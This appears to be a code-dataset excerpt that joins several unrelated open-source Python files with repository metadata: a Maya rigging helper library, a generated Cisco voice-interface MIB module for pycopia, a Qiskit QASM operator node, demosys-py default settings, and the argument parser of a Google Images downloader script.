src_attr = cmds.connectionInfo(sel+'.'+ch, sourceFromDestination=True)
if src_attr:
KstOut.debug(KstMaya._debug, 'SOURCE: '+src_attr)
KstOut.debug(KstMaya._debug, 'DEST: '+sel+'.'+ch)
cmds.disconnectAttr(src_attr, sel+'.'+ch)
# Make constraint in more simple mode
def make_constraint(self, src, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weight=1, aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None):
'''
Desc:
Make any contraint
Parameter:
src = source object object contraint from
dst = destination object constraint to:
constraintType = constraint type
offset = mantaintOffset bool val
Return:
contraint str name
'''
# var for constraint name
constraint = []
type=''
# Fix name
name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '')
# Parent constraint
if constraint_type == 'parent':
type='PAC'
constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weight, st=skip_translate, name=name+'_'+type)
# Point constraint
elif constraint_type == 'point':
type='PC'
constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_translate, name=name+'_'+type)
# Orient constraint
elif constraint_type == 'orient':
type='OC'
constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, name=name+'_'+type)
# Aim constraint, ToDo, optimize
elif constraint_type == 'aim':
type='AC'
if world_up_type == 'object':
if world_up_object == None:
KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None")
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type)
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type)
#constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type))
# Delete constraint node if needed
if keep_constraint_node == False:
cmds.delete(constraint)
return constraint
# Make multi constraint in more simple mode
def make_multi_constraint(self, src_list, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weights_list=[1.0], aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None):
'''
Desc:
Make multiconstraint for any contraint
Parameter:
src = source object object contraint from
dst = destination object constraint to:
constraintType = constraint type
offset = mantaintOffset bool val
Return:
contraint str name
'''
# var for constraint name
constraint = []
type=''
# Fix name
name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '')
# Loop each element in src_list
i = 0
for src in src_list:
# Parent constraint
if constraint_type == 'parent':
type='PAC'
constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weights_list[i], st=skip_translate, name=name+'_'+type)
i = i+1
# Point constraint
elif constraint_type == 'point':
type='PC'
constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_translate, name=name+'_'+type)
i = i+1
# Orient constraint
elif constraint_type == 'orient':
type='OC'
constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, name=name+'_'+type)
i = i+1
# Aim constraint, ToDo, optimize
elif constraint_type == 'aim':
type='AC'
if world_up_type == 'object':
if world_up_object == None:
KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None")
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type)
else:
constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type)
i = i+1
#constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type))
# Delete constraint node if needed
if keep_constraint_node == False:
cmds.delete(constraint)
return constraint
# Get position list from object position
def get_position_list_from_objs(self, object_list, coords_space='world'):
'''
Desc:
Get a position list from object list
Parameter:
object_list = the object list
coords_space = the coordinat space, can be "world" (default), or "local"
Return:
list with positions
'''
position_list = []
# Check if position list is valid
if object_list:
# Set coords to world
if coords_space == 'world':
world_space = True
object_space = False
# Set coord to local
elif coords_space == 'local':
world_space = False
object_space = True
for obj in object_list:
KstOut.debug(KstMaya._debug, obj)
obj_pos = cmds.xform(obj, q=True, t=True, ws=world_space, os=object_space)
position_list.append(obj_pos)
return position_list
else:
KstOut.debug(KstMaya._debug, 'Check if inputs are valid')
return None
# Get cvs list
def get_num_cvs(self, curve):
'''
Desc:
Get cvs lenght from a curve
Parameter:
curve = curve to get cvs positin list from
coords_space = the coordinat space, can be "world" (default), or "local"
Return:
list with positions
'''
# If curve is nod define or not correct release error
if curve:
# Get curve shape
curve_shape = KstMaya.get_shape_node(curve)
# Get degree
degree = cmds.getAttr(curve_shape+".degree")
# Get spans
spans = cmds.getAttr(curve_shape+".spans")
# Calulating ncvs with formula spans+degree
ncvs = spans+degree
# Return the list
return ncvs
else:
cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve)
return None
@staticmethod
# Get position list from cvs position
def get_cvs_position_list_from_curve(curve, coords_space='world'):
'''
Desc:
Get cv position list from a curve
Parameter:
curve = curve to get cvs positin list from
coords_space = the coordinat space, can be "world" (default), or "local"
Return:
list with positions
'''
# If curve is nod define or not correct release error
if curve:
# Define a list with all positions
position_list = []
# Define ws var
ws = False
# Get curve shape
curve_shape = KstMaya.get_shape_node(curve)
# Get degree
degree = cmds.getAttr(curve_shape+".degree")
# Get spans
spans = cmds.getAttr(curve_shape+".spans")
# Calulating ncvs with formula spans+degree
ncvs = spans+degree
# Define and set ws var for xform
if coords_space=='world':
ws = True
# Iterate over curve cvs
for i in range(0, ncvs):
pos = cmds.xform(curve_shape+".cv[%s]" % i, q = True, t = True, ws = ws)
position_list.append(pos)
# Return the list
return position_list
else:
cmds.warning("Curve %s, is not defined, or is not a curve, double check!" % curve)
return None
def transfer_connections(self, src, dst, connections_list, mode = 'move'):
'''
Desc:
Copy or Move, connections from one node to another one
Parameter:
src = source object move (or copy) connections from
dst = destination object move (or copy) connections to
connections_list = connections list to move or copy
Return:
None
'''
# List connections for src
if len(connections_list):
for conn in connections_list:
src_connections = cmds.listConnections('%s.%s' % (src, conn), c = True, plugs = True)
# Now in src_connections[0] there's the original src, and in src_connectons[0] the original destination
# so, just replace the src_name
# Store the current connection
curr_conn = src_connections[0].split('.')[1]
# If mode is setted on move disconnect old object
if mode == 'move':
self.node_op(src_connections[0], '||', src_connections[1])
# Exchange src with specified destination
new_src = dst
# Reconnect
self.node_op('%s.%s' % (new_src, curr_conn), '>>', src_connections[1])
# Insert element in hierarchy
def insert_parent(self, src, dst, reset_src_trs = True):
'''
Desc:
Insert an object in the middle of an existing hierarchy
Parameter:
src = object to insert
dst = destination object that will be reparented
Return:
None
'''
# Check existing hierarchy
# Who's the parent
parent = KstMaya.get_his_parent(dst)
# Who's the child
child = KstMaya.get_his_child(dst)
# Remake hiararchy
cmds.parent(src, parent)
cmds.parent(child, src)
return parent, src, child
def mirror_this(self, obj_to_mirror, plane = 'YZ'): # ToDo: finish and check
'''
Desc:
Mirror object
Parameter:
src = object to insert
dst = destination object that will be reparented
Return:
None
'''
mirrored = obj_to_mirror.replace('L','R')
trs = cmds.xform(obj_to_mirror, q=True, t=True, ws=True)
trs_vec = om.MVector(float(trs[0]), float(trs[1]), float(trs[2]))
if plane == 'YZ':
mirror_axis = om.MVector(-1, 1, 1)
if plane == 'XZ':
mirror_axis = om.MVector(1, -1, 1)
if plane == 'YZ':
mirror_axis = om.MVector(1, 1, -1)
else:
pass
mirrored_coords = om.MVector(trs_vec.x * mirror_axis.x, trs_vec.y * mirror_axis.y, trs_vec.z * mirror_axis.z)
cmds.setAttr('%s.%s' % (mirrored, 'tx'), mirrored_coords.x )
cmds.setAttr('%s.%s' % (mirrored, 'ty'), mirrored_coords.y )
cmds.setAttr('%s.%s' % (mirrored, 'tz'), mirrored_coords.z )
return mirrored_coords
# calculate the closest vertex from give distance
def get_closest_vertices_between(self, src, dst, dist): # ToDo: check code
'''
Desc:
Insert an object in the middle of an existing hierarchy
Parameter:
src = object to insert
dst = destination object that will be reparented
Return:
None
'''
# Get the relative MObject for use method API for source and destination
oSrc = KstCore.get_mobject_from_name(src)
oDst = KstCore.get_mobject_from_name(dst)
# Get the relative DAG for use method API for source and destination
dSrc = KstCore.get_dag_from_node_name(src)
dDst = KstCore.get_dag_from_node_name(dst)
# Attach mesh functions to src and dst objects
srcFnMesh = om.MFnMesh(dSrc)
dstFnMesh = om.MFnMesh(dDst)
# Define the list for closestVertex storage
closest_vlist = list()
# Check if the datatype is mesh
if srcFnMesh.type() == om.MFn.kMesh and dstFnMesh.type() == om.MFn.kMesh:
srcItVert = om.MItMeshVertex(oSrc)
dstItVert = om.MItMeshVertex(oDst)
# Define variables for mesh iterator
srcVtxPos = om.MPoint()
dstVtxPos = om.MPoint()
ws = om.MSpace.kObject
# Define empty point cloud for stora all position from the iterator
srcVtxsPos = om.MPointArray()
# Define empty point cloud for store closest points result
closestPoints = om.MPointOnMesh()
# Define MMeshIntersector on destination mesh for get closest point
meshIntersector = om.MMeshIntersector()
# Define a DAGPath for retrieve selection based on component
selectionClosest = om.MSelectionList()
selection_dag = om.MDagPath()
# Iterate over all mesh vertices, and get all positions
while not srcItVert.isDone():
# Get current position
srcVtxPos = srcItVert.position(ws)
while not dstItVert.isDone():
srcVtxDest = dstItVert.position(ws)
mag = KstMath.get_mag(KstMath.vec_from_2_points(srcVtxPos, srcVtxDest))
if mag <= dist:
closest_vlist.append(dstItVert.index())
cmds.select(dst+'.vtx[%s]' % dstItVert.index(), add=True)
dstItVert.next()
srcItVert.next()
print('ARRAY CLOSEST: ', closest_vlist)
'''
clothRigGrp = "clothAnimRig_GRP"
jntPos = cmds.xform(jnt, q=True, ws=True, t=True)
sel = sel.replace("[u'","")
sel = sel.replace("']","")
scluster = str(sknMsh)
scluster = scluster.replace("[u'","")
scluster = scluster.replace("']","")
vtxs = cmds.polyEvaluate(sel, v=True)
ntotVtxs = vtxs/njoints
closestPoints = []
#print jntPos
#for i in xrange(vtxs):
for i in range(500):
vtx = (sel+".vtx["+str(i)+"]")
print " "
print vtx
if cmds.progressBar(progressControl, query = True, isCancelled = True):
break
#if i%2 == 1:
ppos = []
ppos = cmds.xform((sel+".vtx["+str(i)+"]"), q = True, ws = True, t = True)
newpos = [ppos[0] - jntPos[0], ppos[1] - jntPos[1], ppos[2] - jntPos[2]]
res = mag(newpos)
cmds.text(stat, edit=True, label = (str(i)+"/"+str(vtxs)))
skinJointsList = maya.mel.eval('skinPercent -query -transform %(scluster)s %(vtx)s' %vars())
# ToDo: skinCluster conversion\
trackers = []
weights = []
newjnt = []
cpStra = 'pointConstraint -mo '
cpStrb = ''
for obj in skinJointsList:
transform = obj
joints = (obj+".vtx["+str(i)+"]JNT")
skinValue = maya.mel.eval('skinPercent -transform %(transform)s -query -value %(scluster)s %(vtx)s' %vars())
#print ("DEBUG: "+str(transform)+" VALUE: "+str(skinValue))
if (res <= dist):
newjnt = cmds.joint(n = (obj+".vtx["+str(i)+"]JNT"),p = ppos)
cmds.setAttr((newjnt+'.radius'),.05)
cmds.parent(newjnt, clothRigGrp)
trackers.append(obj)
weights.append(skinValue)
if len(trackers) > 0:
print trackers
print weights
#print trackers
#print weights
#cmds.pointConstraint(trackers, newjnt, mo = True)
#cpStra+= ('%(trackers)s ')
#cpStrj= ('%(joints)s ')
#cpStrb+= ('%(weights)s ')
#print(cpStra+cpStrj)
#print trackers
#print weights
cmds.progressBar(progressControl, edit = True, step = 1)
'''
# Abc code
def abc_import(self, mode='Import', namespace='', file_path=''):
cmdStr = ''
# Import
if mode == 'Import':
cmds.file(file_path, i=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace)
# Reference
if mode == 'Reference':
cmds.file(file_path, r=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace)
def foo(self):
pass | bsd-3-clause | -8,954,775,622,513,176,000 | 34.689055 | 303 | 0.545569 | false |
xiangke/pycopia | mibs/pycopia/mibs/CISCO_VOICE_IF_MIB.py | 1 | 6172 | # python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from IF_MIB import ifIndex
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, Integer32
from CISCO_TC import CountryCode
from CISCO_SMI import ciscoMgmt
from SNMPv2_TC import TruthValue, DisplayString
class CISCO_VOICE_IF_MIB(ModuleObject):
path = '/usr/share/snmp/mibs/site/CISCO-VOICE-IF-MIB'
conformance = 3
name = 'CISCO-VOICE-IF-MIB'
language = 2
description = 'Common Voice Interface MIB module.\nThe MIB module manages the common voice related parameters\nfor both voice analog and ISDN interfaces.'
# nodes
class ciscoVoiceInterfaceMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64])
name = 'ciscoVoiceInterfaceMIB'
class cvIfObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1])
name = 'cvIfObjects'
class cvIfCfgObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1])
name = 'cvIfCfgObjects'
class cvIfConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2])
name = 'cvIfConformance'
class cvIfCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 1])
name = 'cvIfCompliances'
class cvIfGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2])
name = 'cvIfGroups'
# macros
# types
# scalars
# columns
class cvIfCfgNoiseRegEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgNonLinearProcEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgMusicOnHoldThreshold(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dBm'
class cvIfCfgInGain(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dB'
class cvIfCfgOutAttn(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dB'
class cvIfCfgEchoCancelEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgEchoCancelCoverage(ColumnObject):
status = 1
access = 5
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 7])
syntaxobject = pycopia.SMI.Basetypes.Enumeration
enumerations = [Enum(1, 'echoCanceller16ms'), Enum(2, 'echoCanceller24ms'), Enum(3, 'echoCanceller32ms')]
class cvIfCfgConnectionMode(ColumnObject):
status = 1
access = 5
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.Enumeration
enumerations = [Enum(1, 'normal'), Enum(2, 'trunk'), Enum(3, 'plar')]
class cvIfCfgConnectionNumber(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 9])
syntaxobject = pycopia.SMI.Basetypes.DisplayString
class cvIfCfgInitialDigitTimeOut(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 10])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'seconds'
class cvIfCfgInterDigitTimeOut(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'seconds'
class cvIfCfgRegionalTone(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 12])
syntaxobject = CountryCode
# rows
class cvIfCfgEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([ifIndex], False)
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1])
access = 2
columns = {'cvIfCfgNoiseRegEnable': cvIfCfgNoiseRegEnable, 'cvIfCfgNonLinearProcEnable': cvIfCfgNonLinearProcEnable, 'cvIfCfgMusicOnHoldThreshold': cvIfCfgMusicOnHoldThreshold, 'cvIfCfgInGain': cvIfCfgInGain, 'cvIfCfgOutAttn': cvIfCfgOutAttn, 'cvIfCfgEchoCancelEnable': cvIfCfgEchoCancelEnable, 'cvIfCfgEchoCancelCoverage': cvIfCfgEchoCancelCoverage, 'cvIfCfgConnectionMode': cvIfCfgConnectionMode, 'cvIfCfgConnectionNumber': cvIfCfgConnectionNumber, 'cvIfCfgInitialDigitTimeOut': cvIfCfgInitialDigitTimeOut, 'cvIfCfgInterDigitTimeOut': cvIfCfgInterDigitTimeOut, 'cvIfCfgRegionalTone': cvIfCfgRegionalTone}
# notifications (traps)
# groups
class cvIfGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 1])
group = [cvIfCfgNoiseRegEnable, cvIfCfgNonLinearProcEnable, cvIfCfgMusicOnHoldThreshold, cvIfCfgInGain, cvIfCfgOutAttn, cvIfCfgEchoCancelEnable, cvIfCfgEchoCancelCoverage, cvIfCfgInitialDigitTimeOut, cvIfCfgInterDigitTimeOut, cvIfCfgRegionalTone]
class cvIfConnectionGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 2])
group = [cvIfCfgConnectionMode, cvIfCfgConnectionNumber]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
| lgpl-2.1 | -397,005,942,782,059,600 | 33.870056 | 607 | 0.733798 | false |
atilag/qiskit-sdk-py | qiskit/qasm/_node/_unaryoperator.py | 1 | 1662 | # -*- coding: utf-8 -*-
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM unary operator.
"""
import operator
from ._node import Node
from ._nodeexception import NodeException
VALID_OPERATORS = {
'+': operator.pos,
'-': operator.neg,
}
class UnaryOperator(Node):
"""Node for an OPENQASM unary operator.
This node has no children. The data is in the value field.
"""
def __init__(self, operation):
"""Create the operator node."""
Node.__init__(self, 'unary_operator', None, None)
self.value = operation
def operation(self):
"""
Return the operator as a function f(left, right).
"""
try:
return VALID_OPERATORS[self.value]
except KeyError:
raise NodeException("internal error: undefined prefix '%s'" %
self.value)
def qasm(self, prec=15):
"""Return QASM representation."""
# pylint: disable=unused-argument
return self.value
| apache-2.0 | 6,572,356,457,025,158,000 | 28.678571 | 79 | 0.619134 | false |
Contraz/demosys-py | demosys/conf/default.py | 1 | 1803 | import os
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SCREENSHOT_PATH = os.path.join(PROJECT_DIR, 'screenshots')
# OpenGL context configuration
# version: (MAJOR, MINOR)
OPENGL = {
"version": (3, 3),
}
# Window / context properties
WINDOW = {
"class": "demosys.context.pyqt.GLFW_Window",
"size": (1280, 720),
"aspect_ratio": 16 / 9,
"fullscreen": False,
"resizable": True,
"title": "demosys-py",
"vsync": True,
"cursor": True,
"samples": 0,
}
MUSIC = None
TIMER = 'demosys.timers.clock.Timer'
TIMELINE = 'demosys.timeline.single.Timeline'
ROCKET = {
'mode': 'editor',
'rps': 24,
'project': None,
'files': None,
}
PROGRAM_DIRS = (
)
PROGRAM_FINDERS = (
"demosys.finders.program.FileSystemFinder",
"demosys.finders.program.EffectDirectoriesFinder",
)
PROGRAM_LOADERS = (
'demosys.loaders.program.single.Loader',
'demosys.loaders.program.separate.Loader',
)
TEXTURE_DIRS = (
)
TEXTURE_FINDERS = (
"demosys.finders.textures.FileSystemFinder",
"demosys.finders.textures.EffectDirectoriesFinder",
)
TEXTURE_LOADERS = (
'demosys.loaders.texture.t2d.Loader',
'demosys.loaders.texture.array.Loader',
)
SCENE_DIRS = (
)
SCENE_FINDERS = (
"demosys.finders.scenes.FileSystemFinder",
"demosys.finders.scenes.EffectDirectoriesFinder",
)
SCENE_LOADERS = (
"demosys.loaders.scene.gltf.GLTF2",
"demosys.loaders.scene.wavefront.ObjLoader",
"demosys.loaders.scene.stl_loader.STLLoader",
)
DATA_DIRS = ()
DATA_FINDERS = (
"demosys.finders.data.FileSystemFinder",
"demosys.finders.data.EffectDirectoriesFinder",
)
DATA_LOADERS = (
'demosys.loaders.data.binary.Loader',
'demosys.loaders.data.text.Loader',
'demosys.loaders.data.json.Loader',
)
| isc | 2,767,333,997,683,368,400 | 18.387097 | 73 | 0.672213 | false |
hardikvasa/google-images-download | google_images_download/google_images_download.py | 1 | 52513 | #!/usr/bin/env python
# In[ ]:
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import sys
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request
from urllib.request import Request, urlopen
from urllib.request import URLError, HTTPError
from urllib.parse import quote
import http.client
from http.client import IncompleteRead, BadStatusLine
http.client._MAXHEADERS = 1000
else: # If the Current Version of Python is 2.x
import urllib2
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import httplib
from httplib import IncompleteRead, BadStatusLine
httplib._MAXHEADERS = 1000
import time # Importing the time library to check the time of code execution
import os
import argparse
import ssl
import datetime
import json
import re
import codecs
import socket
args_list = ["keywords", "keywords_from_file", "prefix_keywords", "suffix_keywords",
"limit", "format", "color", "color_type", "usage_rights", "size",
"exact_size", "aspect_ratio", "type", "time", "time_range", "delay", "url", "single_image",
"output_directory", "image_directory", "no_directory", "proxy", "similar_images", "specific_site",
"print_urls", "print_size", "print_paths", "metadata", "extract_metadata", "socket_timeout",
"thumbnail", "thumbnail_only", "language", "prefix", "chromedriver", "related_images", "safe_search", "no_numbering",
"offset", "no_download","save_source","silent_mode","ignore_urls"]
def user_input():
config = argparse.ArgumentParser()
config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False)
config_file_check = config.parse_known_args()
object_check = vars(config_file_check[0])
if object_check['config_file'] != '':
records = []
json_file = json.load(open(config_file_check[0].config_file))
for record in range(0,len(json_file['Records'])):
arguments = {}
for i in args_list:
arguments[i] = None
for key, value in json_file['Records'][record].items():
arguments[key] = value
records.append(arguments)
records_count = len(records)
else:
# Taking command line arguments from users
parser = argparse.ArgumentParser()
parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False)
parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False)
parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after to main keyword', type=str, required=False)
parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before main keyword', type=str, required=False)
parser.add_argument('-l', '--limit', help='delimited list input', type=str, required=False)
parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False,
choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico'])
parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False)
parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False)
parser.add_argument('-o', '--output_directory', help='download images in a specific main directory', type=str, required=False)
parser.add_argument('-i', '--image_directory', help='download images in a specific sub-directory', type=str, required=False)
parser.add_argument('-n', '--no_directory', default=False, help='download images in the main directory but no sub-directory', action="store_true")
parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=int, required=False)
parser.add_argument('-co', '--color', help='filter on color', type=str, required=False,
choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown'])
parser.add_argument('-ct', '--color_type', help='filter on color', type=str, required=False,
choices=['full-color', 'black-and-white', 'transparent'])
parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False,
choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse'])
parser.add_argument('-s', '--size', help='image size', type=str, required=False,
choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP'])
parser.add_argument('-es', '--exact_size', help='exact image resolution "WIDTH,HEIGHT"', type=str, required=False)
parser.add_argument('-t', '--type', help='image type', type=str, required=False,
choices=['face','photo','clipart','line-drawing','animated'])
parser.add_argument('-w', '--time', help='image age', type=str, required=False,
choices=['past-24-hours','past-7-days','past-month','past-year'])
parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False)
parser.add_argument('-a', '--aspect_ratio', help='comma separated additional words added to keywords', type=str, required=False,
choices=['tall', 'square', 'wide', 'panoramic'])
parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False)
parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False)
parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true")
parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true")
parser.add_argument('-pp', '--print_paths', default=False, help="Prints the list of absolute paths of the images",action="store_true")
parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true")
parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true")
parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float)
parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true")
parser.add_argument('-tho', '--thumbnail_only', default=False, help="Downloads only thumbnail without downloading actual images", action="store_true")
parser.add_argument('-la', '--language', default=False, help="Defines the language filter. The search results are authomatically returned in that language", type=str, required=False,
choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish'])
parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False)
parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False)
parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False)
parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true")
parser.add_argument('-sa', '--safe_search', default=False, help="Turns on the safe search filter while searching for images", action="store_true")
parser.add_argument('-nn', '--no_numbering', default=False, help="Allows you to exclude the default numbering of images", action="store_true")
parser.add_argument('-of', '--offset', help="Where to start in the fetched links", type=str, required=False)
parser.add_argument('-nd', '--no_download', default=False, help="Prints the URLs of the images and/or thumbnails without downloading them", action="store_true")
parser.add_argument('-iu', '--ignore_urls', default=False, help="delimited list input of image urls/keywords to ignore", type=str)
parser.add_argument('-sil', '--silent_mode', default=False, help="Remains silent. Does not print notification messages on the terminal", action="store_true")
